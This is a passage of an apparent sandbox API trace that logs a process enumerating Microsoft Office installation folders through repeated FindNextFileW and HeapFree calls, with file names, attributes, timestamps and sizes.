ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="x-none", cAlternateFileName="")) returned 0 [0061.195] FindClose (in: hFindFile=0x4260708 | out: hFindFile=0x4260708) returned 1 [0061.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4331018 | out: hHeap=0x5d0000) returned 1 [0061.196] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Office16", cAlternateFileName="")) returned 1 [0061.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.196] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a96a42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a96a42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xde78, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BSTORM.VSL", cAlternateFileName="")) returned 1 [0061.198] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.198] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45a7036, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45a7036, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4619706, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DBSAMPLE.MDB", cAlternateFileName="")) returned 1 [0061.532] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.532] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PUBSPAPR", cAlternateFileName="")) returned 1 [0061.543] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.543] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc79af6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc79af6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7c11d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fc48, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PUBWZINT.DLL", cAlternateFileName="")) returned 1 [0061.546] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.546] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ReviewRouting_Init.xsn", cAlternateFileName="REVIEW~1.XSN")) returned 1 [0061.563] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4341020 | out: hHeap=0x5d0000) returned 1 [0061.563] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0061.563] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.563] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0061.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.564] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="AccessWeb", cAlternateFileName="ACCESS~1")) returned 1 [0061.564] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.564] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1306082b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x393a40, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ACCICONS.EXE", cAlternateFileName="")) returned 1 [0061.566] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0061.566] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33860, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ACCWIZ.DLL", cAlternateFileName="")) returned 1 [0061.569] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0061.569] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bg", cAlternateFileName="")) returned 1 [0061.595] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0061.595] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca", cAlternateFileName="")) returned 1 [0063.349] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.349] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ee20e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs", cAlternateFileName="")) returned 1 [0063.351] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.351] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da", cAlternateFileName="")) returned 1 [0063.352] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.352] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de", cAlternateFileName="")) returned 1 [0063.353] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.353] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4fe050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DocumentFormat.OpenXml.dll", cAlternateFileName="DOCUME~1.DLL")) returned 1 [0063.355] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.355] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es", cAlternateFileName="")) returned 1 [0063.356] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.356] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="et", cAlternateFileName="")) returned 1 [0063.357] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.358] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu", cAlternateFileName="")) returned 1 [0063.359] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.359] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="EventSource.dll", cAlternateFileName="EVENTS~1.DLL")) returned 1 [0063.360] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.360] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr", cAlternateFileName="")) returned 1 [0063.362] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.362] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x675bda6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gl", cAlternateFileName="")) returned 1 [0063.363] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.363] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he", cAlternateFileName="")) returned 1 [0063.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.365] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hi", cAlternateFileName="")) returned 1 [0063.367] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.367] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr", cAlternateFileName="")) returned 1 [0063.368] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.368] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu", cAlternateFileName="")) returned 1 [0063.370] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.370] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="id", cAlternateFileName="")) returned 1 [0063.371] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0063.371] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="it", cAlternateFileName="")) returned 1 [0064.474] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.474] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja", cAlternateFileName="")) returned 1 [0064.476] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.476] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kk", cAlternateFileName="")) returned 1 [0064.478] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.478] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko", cAlternateFileName="")) returned 1 [0064.507] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.507] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lt", cAlternateFileName="")) returned 1 [0064.509] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.509] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lv", cAlternateFileName="")) returned 1 [0064.511] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.511] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80afe67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80afe67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80afe67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xee40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mashupcompression.dll", cAlternateFileName="MASHUP~1.DLL")) returned 1 [0064.514] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.514] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0822be8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nl", cAlternateFileName="")) returned 1 [0064.530] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.530] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="no", cAlternateFileName="")) returned 1 [0064.531] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.531] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6daa8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Office.dll", cAlternateFileName="")) returned 1 [0064.533] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0064.533] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf755cb7d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 